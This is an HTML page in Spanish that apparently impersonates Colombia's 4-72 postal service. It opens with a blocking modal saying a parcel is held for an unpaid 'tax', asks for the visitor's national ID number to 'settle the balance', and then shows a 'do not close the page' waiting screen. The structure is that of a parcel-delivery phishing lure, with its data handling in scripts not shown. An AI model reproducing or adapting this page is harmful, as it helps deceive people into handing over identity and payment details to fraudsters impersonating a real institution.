<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>El servicio de envíos de Colombia</title>
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
    <link rel="shortcut icon" href="./assets/logos/favicon.png">
    <link href="https://fonts.googleapis.com/css2?family=Nunito:ital,wght@0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;0,1000;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900;1,1000&amp;display=swap" rel="stylesheet">

    <!-- CSS -->
    <link rel="stylesheet" href="./css/normalize.css">
    <link rel="stylesheet" href="./css/main.css">
    
    <!-- VALIDATIONS -->
    <script src="./js/functions.js"></script>

</head>

<body style="overflow-y: hidden;">

    <!-- MODAL ESPERA -->
    <div class="modal" id="modal-esperar">
        <div class="modal-body">
            <h3 class="modal-title">Espera un momento...</h3>
            <div class="d-center">
                <div class="lds-ellipsis"><div></div><div></div><div></div><div></div></div>
            </div>
            <p style="text-align: center;">
                No actualices ni cierres la página.
            </p>
            <span style="text-align: center;" class="thin">Trabajamos día y noche para conectar al país.</span>
        </div>
    </div>


    <!-- MODAL -->
    <div class="modal d-block" id="modal-principal">
        <div class="modal-body">
            <h3 class="modal-title">¡Lo sentimos!</h3>
            <p>
                No hemos podido entregar tu paquete por pago de <b>impuesto</b> NO realizado <span class="thinier">(no incl. en valor envío)</span>.
                Para consultar el estado del envío y liquidar el saldo ingrese su documento en el siguiente campo.
            </p>

            <p class="m-0 thin">Consulta el <b>estado de tu envío</b>.</p>
            <input class="form-input" oninput="limitarDigitos(this, 10)" type="number" id="cc" placeholder="Documento de Identidad...">

            <button class="btn-success" id="success">
                Consultar
            </button>
        </div>
    </div>


    <header>
        <div class="sl-navbar-container">
            <div class="sl-container-center">
                <img class="sl-sup-btn" src="./assets/svg/sl_sup_btn.png">
            </div>
            <div class="sl-navbar-body">
                <img src="./assets/logos/logo_472.png" class="sl-navbar-logo">
                <img src="./assets/svg/sl_menu.png" class="sl-navbar-menu">
            </div>
            <div class="sl-container-center">
                <img class="sl-buscar" src="./assets/svg/sl_buscar.png">
            </div>
        </div>
    </header>    

    <section class="sl-header">
    </section>

    <section class="sl-card-container">
        <img class="sl-card-img" src="./assets/svg/sl_card_1.png" alt="">
    </section>


    <!-- JS -->
    <script src="./js/index.js"></script>
</body>
</html>